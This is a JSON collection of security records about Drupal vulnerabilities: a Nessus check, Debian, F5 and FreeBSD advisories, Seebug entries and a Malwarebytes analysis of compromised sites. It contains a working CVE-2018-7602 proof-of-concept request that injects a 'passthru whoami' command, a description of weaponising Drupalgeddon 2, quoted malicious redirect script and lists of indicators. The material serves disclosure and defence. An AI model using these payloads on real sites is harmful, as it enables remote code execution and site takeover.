script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"drupal7-7.56-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2019-05-30T02:22:21", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6932", "CVE-2017-6929", "CVE-2017-6927", "CVE-2017-6928"], "description": "Package : drupal7\nVersion : 7.14-2+deb7u17\nCVE ID : CVE-2017-6927 CVE-2017-6928 CVE-2017-6929\n CVE-2017-6932\nDebian Bug : 891152 891150 891153 891154\n\nMultiple vulnerabilities have been found in the Drupal content\nmanagement framework. For additional information, please refer to the\nupstream advisory at https://www.drupal.org/sa-core-2018-001.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.14-2+deb7u17.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 2, "modified": "2018-02-28T15:17:10", "published": "2018-02-28T15:17:10", "id": "DEBIAN:DLA-1295-1:D58AA", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201802/msg00030.html", "title": "[SECURITY] [DLA 1295-1] drupal7 security update", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-05-30T02:21:38", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6922"], "description": "Package : drupal7\nVersion : 7.14-2+deb7u16\nCVE ID : CVE-2017-6922\n\nPrivate files that have been uploaded by an anonymous user but not permanently\nattached to content on the site should only be visible to the anonymous user\nthat uploaded them, rather than all anonymous users. Drupal core did not\npreviously provide this protection, allowing an access bypass vulnerability to\noccur. This issue is mitigated by the fact that in order to be affected, the\nsite must allow anonymous users to upload files into a private file system. \n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.14-2+deb7u16.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-06-28T16:19:36", "published": "2017-06-28T16:19:36", "id": "DEBIAN:DLA-1004-1:9EDA0", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201706/msg00034.html", "title": "[SECURITY] [DLA 1004-1] drupal7 security update", "type": "debian", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2019-05-30T02:23:08", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7602"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4180-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nApril 25, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : drupal7\nCVE ID : CVE-2018-7602\nDebian Bug : 896701\n\nA remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional information,\nplease refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-004\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u12.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u4.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2018-04-25T20:14:16", "published": "2018-04-25T20:14:16", "id": "DEBIAN:DSA-4180-1:8EEC5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00107.html", "title": "[SECURITY] [DSA 4180-1] drupal7 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:24", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7602"], "description": "Package : drupal7\nVersion : 7.14-2+deb7u19\nCVE ID : CVE-2018-7602\nDebian Bug : 895778\n\nA remote code execution vulnerability has been found within multiple\nsubsystems of Drupal. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\n\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.14-2+deb7u19.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 2, "modified": "2018-04-26T09:28:29", "published": "2018-04-26T09:28:29", "id": "DEBIAN:DLA-1365-1:21036", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201804/msg00030.html", "title": "[SECURITY] [DLA 1365-1] drupal7 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:36", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7600"], "description": "Package : drupal7\nVersion : 7.14-2+deb7u18\nCVE ID : CVE-2018-7600\n\nJasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\n\nFor further information please refer to the official upstream advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 2, "modified": "2018-03-28T22:42:59", "published": "2018-03-28T22:42:59", "id": "DEBIAN:DLA-1325-1:E895C", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201803/msg00028.html", "title": "[SECURITY] [DLA 1325-1] drupal7 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2020-04-06T22:40:25", "bulletinFamily": "software", "cvelist": ["CVE-2018-7602"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-09-13T17:57:00", "published": "2018-05-01T00:09:00", "id": "F5:K59591931", "href": "https://support.f5.com/csp/article/K59591931", "title": "Drupal vulnerability CVE-2018-7602", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-26T22:28:10", "bulletinFamily": "software", "cvelist": ["CVE-2018-7600"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-03-29T18:25:00", "published": "2018-03-29T18:25:00", "id": "F5:K22854260", "href": "https://support.f5.com/csp/article/K22854260", "title": "Drupal vulnerability CVE-2018-7600", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2018-06-26T22:15:29", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.\r\n\r\nUpdated \u2014 this vulnerability is being exploited in the wild.\r\n\r\n#### Poc\r\nThis is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.\r\n \r\nYou must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).\r\n```\r\nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1\r\n[...]\r\nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]\r\n ```\r\n \r\nRetrieve the form_build_id from the response, and then triggering the exploit with :\r\n ```\r\nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1\r\n[...]\r\nform_build_id=[FORM_BUILD_ID]\r\n````\r\n \r\nThis will display the result of the whoami command.", "published": "2018-04-26T00:00:00", "type": "seebug", "title": "Drupal core Remote Code Execution(CVE-2018-7602)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7602"], "modified": "2018-04-26T00:00:00", "id": "SSV:97246", "href": "https://www.seebug.org/vuldb/ssvid-97246", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}, {"lastseen": "2018-06-08T07:10:20", "description": "Two weeks ago, a highly critical (21/25 NIST rank) vulnerability, nicknamed Drupalgeddon 2 (SA-CORE-2018-002 / CVE-2018-7600), was disclosed by the Drupal security team. This vulnerability allowed an unauthenticated attacker to perform remote code execution on default or common Drupal installations.\r\n\r\nDrupal is an open-source content management system (CMS) that is used by more than one million sites around the world (including governments, e-retail, enterprise organizations, financial institutions and more), all of which are vulnerable unless patched.\r\n\r\nUntil now details of the vulnerability were not available to the public, however, Check Point Research can now expand upon this vulnerability and reveal exactly how it works.\r\n\r\nIn brief, Drupal had insufficient input sanitation on Form API (FAPI) AJAX requests. As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication. By exploiting this vulnerability an attacker would have been able to carry out a full site takeover of any Drupal customer.\r\n\r\nThe vulnerability existed on all Drupal versions from 6 to 8, though has since been patched to those who manually update their site. In this document we will showcase real life attack scenarios around an out-of-the-box installation of Drupal\u2019s flagship product, Drupal 8.\r\n\r\n### Technical Details\r\n\r\n#### The Vulnerability\r\n\r\nTo provide some background, Drupal\u2019s Form API was introduced in Drupal 6 and allowed alteration of the form data during the form rendering process. This revolutionized the way markup processing was done.\r\n\r\nIn Drupal 7 the Form API was generalized to what is now known as \u201cRenderable Arrays\u201d. This extended API is used to represent the structure of most of the UI elements in Drupal, such as pages, blocks, nodes and more.\r\n\r\nRenderable arrays contain metadata that is used in the rendering process. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). Please see below for an example:\r\n```\r\n[\r\n\u2018#type\u2019 => \u2018markup\u2019,\r\n\u2018#markup\u2019 => \u2018<em>some text</em>\u2019,\r\n\u2018#prefix\u2019 => \u2018<div>\u2019,\r\n\u2018#suffix\u2019 => \u2018</div>\u2019\r\n]\r\n```\r\n\r\n#### Drupal\u2019s Patch\r\n\r\nThe patch that Drupal published adds a single class called RequestSanitizer with a stripDangerousValues method that unsets all the items in an input array for keys that start with a hash sign. This method sanitizes input data in `$_GET`, `$_POST` & `$_COOKIES` during the very early stages of Drupal\u2019s bootstrap (immediately after loading the site configurations).\r\n\r\nWe assume that one of the reasons that the patch was done in this way was to make it harder to find and exploit the vulnerability.\r\n\r\n#### Finding an Attack Vector\r\n\r\nBecause of the above we focused on forms that are exposed to anonymous users.\r\n\r\nThere are a few of those forms available, one of which is the user registration form. This form contains multiple fields, as can be seen in the screenshot below.\r\n\r\n\r\n\r\nFigure 1: The Drupal registration form.\r\n\r\nWe knew that we needed to inject a renderable array somewhere in the form structure, we just had to find out where.\r\n\r\nAs it happens, the \u201cEmail address\u201d field does not sanitize the type of input that it receives. This allowed us to inject an array to the form array structure (as the value of the email field).\r\n\r\n\r\n\r\nFigure 2: Injecting our renderable array into the mail input of the registration form.\r\n\r\n\r\n\r\nFigure 3: Example of injected form renderable array.\r\n\r\nNow all we needed was for Drupal to render our injected array. Since Drupal treats our injected array as a value and not as an element, we needed to trick Drupal into rendering it.\r\n\r\nThe situations in which Drupal renders arrays are as follows:\r\n\r\n1. Page load\r\n2. Drupal AJAX API \u2013 i.e. when a user fills an AJAX form, a request is made to Drupal which renders an HTML markup and updates the form.\r\n\r\n\r\nAfter investigating possible attack vectors surrounding the above functionalities, because of the post-submission rendering process and the way Drupal implements it, we came to the conclusion that an AJAX API call is our best option to leverage an attack.\r\n\r\nAs part of the user registration form, the \u201cPicture\u201d field uses Drupal\u2019s AJAX API to upload a picture into the server and replace it with a thumbnail of the uploaded image.\r\n\r\n\r\n\r\nFigure 4: Form used to upload a picture using AJAX API.\r\n\r\nDiving into the AJAX file upload callback revealed that it uses a GET parameter to locate the part of the form that needs to be updated in the client.\r\n\r\n\r\n\r\nFigure 5: The AJAX \u2018upload file\u2019 callback function code.\r\n\r\nAfter pointing element_parents to the part of the form that contained our injected array, Drupal successfully rendered it.\r\n\r\n#### Weaponizing Drupalgeddon 2\r\n\r\nNow, all we had to do is to inject a malicious render array that uses one of Drupal\u2019s rendering callback to execute code on the system.\r\n\r\nThere were several properties we could have injected:\r\n\r\n* #access_callback\r\n\t* Used by Drupal to determine whether or not the current user has access to an element.\r\n* #pre_render\r\n\t* Manipulates the render array before rendering.\r\n* #lazy_builder\r\n\t* Used to add elements in the very end of the rendering process.\r\n* #post_render\r\n\t* Receives the result of the rendering process and adds wrappers around it.\r\n\t\r\n\t\r\nFor our POC to work, we chose the #lazy_builder element as the one being injected into the mail array. Combined with the AJAX API callback functionality, we could direct Drupal to render our malicious array.\r\n\r\nThis allowed us to take control over the administrator\u2019s account, install a malicious backdoor module and finally execute arbitrary commands on the server.\r\n\r\n\r\n\r\nFigure 6: injecting malicious command into one of Drupal\u2019s rendering callbacks.\r\n\r\n\r\n\r\nFigure 7: Successfully executing shell commands using the malicious module.\r\n\r\n### Conclusion\r\n\r\nAfter seeing earlier publications on Twitter and several security blogs, it was apparent that there was much confusion among the community regarding this vulnerability announcement, with some even doubting the severity of it. As a result, we considered it worthwhile to looking deeper into.\r\n\r\nThe research however was challenging as we were starting from a very large attack surface since the patch blurred the real attack vectors. To expedite our findings, we were fortunate to be joined by experts in the Drupal platform. The final results highlight how easy it is for organization to be exposed through no fault of their own, but rather through the third party platforms they use every day.", "published": "2018-03-30T00:00:00", "type": "seebug", "title": "Drupal core Remote Code Execution(CVE-2018-7600)\n (Drupalgeddon2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7600"], "modified": "2018-03-30T00:00:00", "id": "SSV:97207", "href": "https://www.seebug.org/vuldb/ssvid-97207", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "freebsd": [{"lastseen": "2019-05-29T18:32:00", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6929", "CVE-2017-6930", "CVE-2017-6927", "CVE-2017-6928"], "description": "\nDrupal Security Team reports:\n\nCVE-2017-6926: Comment reply form allows access to restricted content\nCVE-2017-6927: JavaScript cross-site scripting prevention is incomplete\nCVE-2017-6928: Private file access bypass - Moderately Critical\nCVE-2017-6929: jQuery vulnerability with untrusted domains - Moderately Critical\nCVE-2017-6930: Language fallback can be incorrect on multilingual sites with node access restrictions\nCVE-2017-6931: Settings Tray access bypass\nCVE-2017-6932: External link injection on 404 pages when linking to the current page\n\n", "edition": 6, "modified": "2018-02-21T00:00:00", "published": "2018-02-21T00:00:00", "id": "57580FCC-1A61-11E8-97E0-00E04C1EA73D", "href": "https://vuxml.freebsd.org/freebsd/57580fcc-1a61-11e8-97e0-00e04c1ea73d.html", "title": "drupal -- Drupal Core - Multiple Vulnerabilities", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2018-06-05T16:04:05", "bulletinFamily": "blog", "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "description": "Drupal is one of the most popular Content Management Systems (CMS), along with WordPress and Joomla. In late March 2018, Drupal was affected by a major remote code execution vulnerability ([CVE-2018-7600](<https://www.drupal.org/sa-core-2018-002>)) followed by yet another ([CVE-2018-7602](<https://www.drupal.org/sa-core-2018-004>)) almost a month later, both aptly nicknamed Drupalgeddon 2 and Drupalgeddon 3.\n\nThese back-to-back vulnerabilities were accompanied by proof of concepts that translated into almost immediate real-world attacks. For many website owners, this situation was frustrating because the window of time to patch is getting considerably smaller. Additionally, updating or upgrading Drupal (or any other CMS for that matter) may have side effects, such as broken templates or functionality, which is why you need to make a full back up and test the changes in the staging environment before moving to production.\n\nRolling out a CMS is usually the easy part. Maintaining it is where most problems occur due to lack of knowledge, fear of breaking something, and, of course, costs. While this is an earned responsibility for each site owner to do due diligence with their web properties, the outcome is typically websites being severely out of date and exploited, often more than once.\n\n### Sample set and web crawl\n\nWe decided to choose a number web properties that had not yet been validated (including all versions of Drupal, vulnerable or not). Our main source of URLs came from [Shodan](<https://www.shodan.io/>) and was complemented by [PublicWWW](<https://publicwww.com/>), for a total of roughly 80,000 URLs to crawl. We were surprised to start hitting compromised sites quickly into the process and were able to confirm around [900 injected web properties](<https://pastebin.com/GCWiSpa3>).\n\nMany of the results were servers hosted on Amazon or other cloud providers that were most likely set up for testing purposes (staging) and never removed or upgraded. Thankfully, they received little to no traffic. The other domains we encountered spanned a variety of verticals and languages, with one common denominator: an outdated version (usually severely outdated) of the Drupal CMS.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/Crawl.png> \"\" )\n\n_Figure 1: Crawling and flagging compromised Drupal sites using Fiddler_\n\n### Drupal versions\n\nAt the time of this writing, there are two [recommended releases](<https://www.drupal.org/project/drupal>) for Drupal. Version 8.x.x is the latest and greatest with some new features, while 7.x.x is considered the most stable and compatible version, especially when it comes to themes.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/releases_.png> \"\" )\n\n_Figure 2: Drupal's two main supported branches_\n\nAlmost half the sites we flagged as compromised were running Drupal version 7.5.x, while version 7.3.x still represented about 30 percent, a fairly high number considering it was last updated in [August 2015](<https://www.drupal.org/project/drupal/releases/7.39>). Many security flaws have been discovered (and exploited) since then.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats1.png> \"\" )\n\n_Figure 3: Percentage of compromised sites belonging to a particular Drupal version_\n\n### Payloads\n\nA large number of Drupal sites that have been hacked via these two recent exploits were also infected with server-side malware, in particular with [XMRig cryptocurrency miners](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>). However, in this post we will focus on the client-side effects of those compromises. Neither are exclusive though, and one should expect that a hacked site could be performing malicious actions on both server and client side.\n\nUnsurprisingly, web miners were by far the most common type of injection we noticed. But we also came across a few different social engineering campaigns.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats2.png> \"\" )\n\n_Figure 4: Breakdown of the most common payloads_\n\n#### Web miners\n\n[Drive-by mining attacks](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) went though the roof in the fall of 2017 but slowed down somewhat at the beginning of the year. It's safe to say that the recent Drupal vulnerabilities have added fuel to the fire and resulted in increased activity. Coinhive injections remain by far the most popular choice, although public or private Monero pools are gaining traction as well.\n\nWe are seeing the same campaign that was [already documented](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>) by other researchers in early March and is ensnaring more victims by the day.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/coinhive_uni.png> \"\" )\n\n_Figure 5: A subdomain of Harvard University's main site mining Monero_\n\n#### Fake updates\n\nThis campaign of fake browser updates we [documented earlier](<https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/>) is still going strong. It distributes a password stealer of Remote Administration Tool (RAT).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/FakeUpdates.png> \"\" )\n\n_Figure 6: A compromised Drupal site pushing a fake Chrome update_\n\n#### Tech support scams (browlocks)\n\nRedirections to browser locker pages\u2014a typical approach for unveiling tech support scams. The most common redirection we were able to document involved an intermediary site redirecting to browser locker pages using the .TK Top Level Domain (TLD) name.\n \n \n mysimplename[.]com/si.php\n window.location.replace(\"http://hispaintinghad[.]tk/index/?1641501770611\");\n window.location.href = \"http://hispaintinghad[.]tk/index/?1641501770611\";\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/TSS_redirection.png> \"\" )\n\n_Figure 7: A compromised Drupal host redirecting to a browser locker page_\n\n### Web miners and injected code\n\nWe collected different types of code injection, from simple and clear text to long obfuscated blurbs. It\u2019s worth noting that in many cases the code is dynamic\u2014most likely a technique to evade detection.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/miner_injections.png> \"\" )\n\n_Figure 8: Collage of some of the most common miner injections_\n\n### Snapshots\n\nThe following are some examples of compromised sites sorted by category. We have contacted all affected parties to let them know their resources are being used by criminals to generate profit from malicious cryptomining or malware infections.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/uni1.png> \"\" )\n\n_Figure 9: Education (University of Southern California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/gov1.png> \"\" )\n\n_Figure 10: Government (Arkansas Courts & Community Initiative)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/political.png> \"\" )\n\n_Figure 11: Political party (Green Party of California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/reviveadserver.png> \"\" )\n\n_Figure 12: Ad server (Indian TV Revive Ad server)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/religious.png> \"\" )\n\n_Figure 13: Religion (New Holly Light)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/health_.png> \"\" )\n\n_Figure 14: Health (NetApp Benefits)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/conf.png> \"\" )\n\n_Figure 15: Conferences (Red Hat partner conference) _\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/tech.png> \"\" )\n\n_Figure 16: Tech (ComputerWorld's Brazilian portal)_\n\n### Malicious cryptomining remains hot\n\nIt is clear that right now, cryptomining is the preferred kind of malicious injection. There are many public but also private APIs that make the whole process easy, and unfortunately they are being abused by bad actors.\n\nCompromised sites big and small remain a hot commodity that attackers will try to amass over time. And because patching remains an issue, the number of potential new victims never stops growing. In light of this, website owners should look into other kinds of mitigation when patching is not always an immediate option, and check what some people call virtual patching. In particular, Web Application Firewalls (WAFs) have helped many stay protected even against new types of attacks, and even when their CMS was vulnerable.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) continues to detect and block malicious cryptomining and other unwanted redirections.\n\n### Indicators of compromise\n\n**Coinhive**\n\n-> URIs\n \n \n cnhv[.]co/1nt9z\n coinhive[.]com/lib/coinhive.min.js\n coinhive[.]com/lib/cryptonight.wasm\n coinhive[.]com/lib/worker-asmjs.min.js?v7\n ws[0-9]{3}.coinhive[.]com/proxy\n\n-> Site keys\n \n \n CmGKP05v2VJbvj33wzTIayOv6YGLkUYN\n f0y6O5ddrXo1be4NGZubP1yHDaWqyflD\n kAdhxvdilslXbzLAEjFQDAZotIVm5Jkf\n MKr3Uf5CaT88pcqzAXltkBu4Us5gHWaj\n NL9TTsyGeVU8FbKR9fUvwkwU4qPJ4Z2I\n no2z8X4wsiouyTmA9xZ0TyUdegWBw2yK\n oHaQn8uDJ16fNhcTU7y832cv49PqEvOS\n PbNDLKIHLCM0hNXOIM7sRTsk66ZuAamf\n RYeWLxbPVlfPNsZUh231aLXoYAdPguXY\n XoWXAWvizTNnyia78qTIFfATRgcbJfGx\n YaUkuGZ3pmuPVsBMDxSgY45DwuBafGA3\n\n**Crypto-Loot**\n\n-> URI\n \n \n cryptaloot[.]pro/lib/justdoit2.js\n\n-> Keys\n \n \n 48427c995ba46a78b237c5f53e5fef90cd09b5f09e92\n 6508a11b897365897580ba68f93a5583cc3a15637212\n d1ba2c966c5f54d0da15e2d881b474a5091a91f7c702\n\n**EthPocket**\n \n \n eth-pocket[.]com:8585\n eth-pocket[.]de/perfekt/perfekt.js\n\n**JSECoin**\n \n \n jsecoin[.]com/platform/banner1.html?aff1564&utm_content=\n\n**DeepMiner**\n \n \n greenindex.dynamic-dns[.]net/jqueryeasyui.js\n\n**Other CryptoNight-based miner**\n \n \n cloudflane[.]com/lib/cryptonight.wasm\n\n**FakeUpdates**\n \n \n track.positiverefreshment[.]org/s_code.js?cid=220&v=24eca7c911f5e102e2ba\n click.clickanalytics208[.]com/s_code.js?cid=240&v=73a55f6de3dee2a751c3\n 185.244.149[.]74\n 5.9.242[.]74\n\n**Tech scams**\n \n \n 192.34.61[.]245\n 192.81.216[.]165\n 193.201.224[.]233\n 198.211.107[.]153\n 198.211.113[.]147\n 206.189.236[.]91\n 208.68.37[.]2\n addressedina[.]tk\n andtakinghis[.]tk\n andweepover[.]tk\n asheleaned[.]tk\n baserwq[.]tk\n blackivory[.]tk\n blownagainst[.]tk\n cutoplaswe[.]tk\n dearfytr[.]tk\n doanythingthat[.]tk\n faithlessflorizel[.]tk\n grey-plumaged[.]tk\n haddoneso[.]tk\n handkerchiefout[.]tk\n himinspectral[.]tk\n hispaintinghad[.]tk\n ifheisdead[.]tk\n itshandupon[.]tk\n iwouldsay[.]tk\n leadedpanes[.]tk\n millpond[.]tk\n mineofcourse[.]tk\n momentin[.]tk\n murdercould[.]tk\n mysimplename[.]com\n nearlythrew[.]tk\n nothinglikeit[.]tk\n oncecommitted[.]tk\n portraithedid[.]tk\n posingfor[.]tk\n secretsoflife[.]tk\n sendthemany[.]tk\n sputteredbeside[.]tk\n steppedforward[.]tk\n sweeppast[.]tk\n tellingmeyears[.]tk\n terriblehope[.]tk\n thatwonderful[.]tk\n theattractions[.]tk\n thereisnodisgrace[.]tk\n togetawayt[.]tk\n toseethem[.]tk\n wickedwere[.]tk\n withaforebodingu[.]tk\n\nThe post [A look into Drupalgeddon's client-side attacks](<https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-05-18T15:00:00", "published": "2018-05-18T15:00:00", "id": "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "href": "https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/", "type": "malwarebytes", "title": "A look into Drupalgeddon\u2019s client-side attacks", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2018-04-26T16:08:56", "bulletinFamily": "info", "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "description": 